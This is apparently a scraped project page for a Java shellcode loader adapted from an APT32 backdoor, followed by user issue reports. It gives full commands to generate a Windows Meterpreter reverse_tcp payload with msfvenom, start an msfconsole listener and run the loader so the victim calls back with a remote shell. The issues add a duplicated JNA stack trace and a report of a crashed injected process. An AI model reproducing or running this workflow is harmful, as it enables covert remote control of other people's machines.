基于Java实现的Shellcode加载器

Java ShellCode Loader

基于Java实现的ShellCode加载器，兼容32位及64位平台。

核心代码来源于：JEShell: An OceanLotus (APT32) Backdoor

运行环境：Jre >= 1.5

编译

mvn package -DskipTests

使用

java -jar ShellcodeLoader.jar shellcode_hex

举例

kali

生成hex格式的ShellCode

┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.10 LPORT=4444 -f hex
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
fce88f0000006089e531d2648b5xxxx

然后开启监听

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.10
set LPORT 4444
exploit -j

客户端

java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx

即可收到反弹的Meterpreter

Hello;

after build success mvn;

[INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESS [INFO] ------------------------------------------------------------------------

I get this error when i try compile my meta hex;

java -jar ShellcodeLoader.java hexcode............. Error: Invalid or corrupt jarfile ShellcodeLoader.java

also in jar

i copied the compiled jar into directory and run the command;

java -jar ShellcodeLoader.jar hexcode............. Exception in thread "main" java.lang.UnsatisfiedLinkError: Unable to load library 'kernel32': libkernel32.so: cannot open shared object file: No such file or directory libkernel32.so: cannot open shared object file: No such file or directory Native library (linux-x86-64/libkernel32.so) not found in resource path (ShellcodeLoader.jar) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:302) at com.sun.jna.NativeLibrary.getInstance(NativeLibrary.java:455) at com.sun.jna.Library$Handler.(Library.java:192) at com.sun.jna.Native.load(Native.java:596) at com.sun.jna.platform.win32.Kernel32.(Kernel32.java:42) at java.base/java.lang.Class.forName0(Native Method) at java.base/java.lang.Class.forName(Class.java:333) at com.sun.proxy.$Proxy0.(Unknown Source) at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62) at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) at java.base/java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:500) at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:481) at java.base/java.lang.reflect.Proxy.newProxyInstance(Proxy.java:1020) at java.base/java.lang.reflect.Proxy.newProxyInstance(Proxy.java:1006) at com.sun.jna.Native.loadLibrary(Native.java:648) at com.sun.jna.Native.loadLibrary(Native.java:620) at com.yzddmr6.ShellcodeLoader.(ShellcodeLoader.java:22) Suppressed: java.lang.UnsatisfiedLinkError: libkernel32.so: cannot open shared object file: No such file or directory at com.sun.jna.Native.open(Native Method) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:191) ... 17 more Suppressed: java.lang.UnsatisfiedLinkError: libkernel32.so: cannot open shared object file: No such file or directory at com.sun.jna.Native.open(Native Method) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:204) ... 17 more Suppressed: java.io.IOException: Native library (linux-x86-64/libkernel32.so) not found in resource path (ShellcodeLoader.jar) at com.sun.jna.Native.extractFromResourcePath(Native.java:1095) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:276) ... 17 more

无法上线

生成完成后运行 java -jar ShellcodeLoader-1.0-SNAPSHOT-jar-with-dependencies.jar fc4883e4f0e8cc000000XXXXXX 返回 Shellcode: fc4883e4f0e8cc000000XXXXXX 但是并没有上线注入的进程也崩溃了

opened by famei 2
not compiled.

Hello;

after build success mvn;

[INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESS [INFO] ------------------------------------------------------------------------

I get this error when i try compile my meta hex;

java -jar ShellcodeLoader.java hexcode............. Error: Invalid or corrupt jarfile ShellcodeLoader.java

also in jar

i copied the compiled jar into directory and run the command;

java -jar ShellcodeLoader.jar hexcode............. Exception in thread "main" java.lang.UnsatisfiedLinkError: Unable to load library 'kernel32': libkernel32.so: cannot open shared object file: No such file or directory libkernel32.so: cannot open shared object file: No such file or directory Native library (linux-x86-64/libkernel32.so) not found in resource path (ShellcodeLoader.jar) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:302) at com.sun.jna.NativeLibrary.getInstance(NativeLibrary.java:455) at com.sun.jna.Library$Handler.(Library.java:192) at com.sun.jna.Native.load(Native.java:596) at com.sun.jna.platform.win32.Kernel32.(Kernel32.java:42) at java.base/java.lang.Class.forName0(Native Method) at java.base/java.lang.Class.forName(Class.java:333) at com.sun.proxy.$Proxy0.(Unknown Source) at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62) at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) at java.base/java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:500) at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:481) at java.base/java.lang.reflect.Proxy.newProxyInstance(Proxy.java:1020) at java.base/java.lang.reflect.Proxy.newProxyInstance(Proxy.java:1006) at com.sun.jna.Native.loadLibrary(Native.java:648) at com.sun.jna.Native.loadLibrary(Native.java:620) at com.yzddmr6.ShellcodeLoader.(ShellcodeLoader.java:22) Suppressed: java.lang.UnsatisfiedLinkError: libkernel32.so: cannot open shared object file: No such file or directory at com.sun.jna.Native.open(Native Method) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:191) ... 17 more Suppressed: java.lang.UnsatisfiedLinkError: libkernel32.so: cannot open shared object file: No such file or directory at com.sun.jna.Native.open(Native Method) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:204) ... 17 more Suppressed: java.io.IOException: Native library (linux-x86-64/libkernel32.so) not found in resource path (ShellcodeLoader.jar) at com.sun.jna.Native.extractFromResourcePath(Native.java:1095) at com.sun.jna.NativeLibrary.loadLibrary(NativeLibrary.java:276) ... 17 more

opened by b4sh1t1 1

基于Java实现的Shellcode加载器

Related tags

Overview

Java ShellCode Loader

编译

使用

举例

kali

客户端

You might also like...

Comments

无法上线

not compiled.

Owner

yzddmr6